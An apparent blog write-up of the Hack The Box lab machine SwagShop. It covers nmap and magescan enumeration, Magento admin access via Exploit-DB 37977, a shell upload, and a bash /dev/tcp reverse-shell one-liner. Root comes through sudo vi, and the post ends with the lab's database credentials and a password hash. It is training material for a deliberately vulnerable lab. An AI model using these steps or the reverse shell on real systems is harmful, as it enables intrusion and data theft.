Learning as I go

Swagshop Hack The Box Walkthrough

Posted at — Sep 29, 2019

Walkthrough of machine Swagshop from Hack the Box. Key findings include lack of patching on an ecommerce site & inappropriate privileges being given to a user accessible system account.

Swagshop Banner

Walkthrough of SwagShop machine from Hack the Box.

Key Findings

Key findings noted from the machine SwagShop:

Scanning & Enumeration

Nmap was used to complete an initial scan of the host (command: nmap -A -T4 -oA nmap/Swagshop Amended outputs shown below:

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page

Scan shows reported instances of:

Nmap scan failed to fingerprint the machine. The banner returned by OpenSSH suggests the machine is running Ubuntu Xenial (7.2p2 Ubuntu 4ubuntu2.8 – is the OpenSSH version available on Xenial). This suggests use of a reasonably recent operating system.


Loading up the web server presents what appears to be a normal Magento store.

Swagshop Store

Running magescan across the site (command: php magescan.phar scan:all identifies the version as either or

Magento Information  

| Parameter | Value            |
| Edition   | Community        |
| Version   |, |

Gaining Access & Privilege Escalation


Exploits available for Magento were researched and tested on the machine. A modified version of the exploit at https://www.exploit-db.com/exploits/37977 was successful in providing access to the store administration panel.

Details of the modification made (command: diff 37977.py 37977-modified.py) are below:

<SNIP> - Removed comments at top of the script
< target = "http://target.com/"
> target = ""
<SNIP> - Removed comments at the bottom of the script

Executing the exploit (command: python 37977-modified.py) then provided access to the admin panel:

Check with creds forme:forme

Swagshop Admin Panel

From researching attacks on Magento sites findings from FrogHopper attacks was found (https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper). Based on the guide steps taken to get initial access to the machine:

Swagshop Shell Upload

Swagshop Shell

Confirmed as initial access via user www-data and running on kernel 4.4.0-146. Interactive user shell then setup using bash (command: bash -c ‘bash -i >& /dev/tcp/ 0>&1’)

From reviewing the system, the user.txt file found in /home/haris directory:

www-data@swagshop:/home/haris$ wc -c user.txt
wc -c user.txt
33 user.txt

Further basic enumeration reveals user www-data can run vim with superuser privileges.

www-data@swagshop:/home/haris$ sudo -l
sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

Loading vim and running !bash provides a root shell.

Swagshop Root Shell

Post Exploitation

System Passwords

Hash for user haris ($6$vHexbEDw$yPt59EZF1JrEHwJ8qiwPNfzBEJd9ei.jG/Cdiw/Huj4pvX9tHovMR20ypKEcCjcxMb8lvlo9zu9BGYx1ipdRB/) was extracted. Cracking of it was attempted but unsuccessful.

Database Passwords

Database credentials used by Magento were found in the file local.xml stored under /var/www/html/app/etc. Username is root and password is fMVWh7bDHpgZkyfqQXreTjU9.

Database Extract

Identified database credentials were used to dump a local copy of the data.

root@kali2019:~/Documents/SwagShop# wc -c dbdump.txt
4134404 dbdump.txt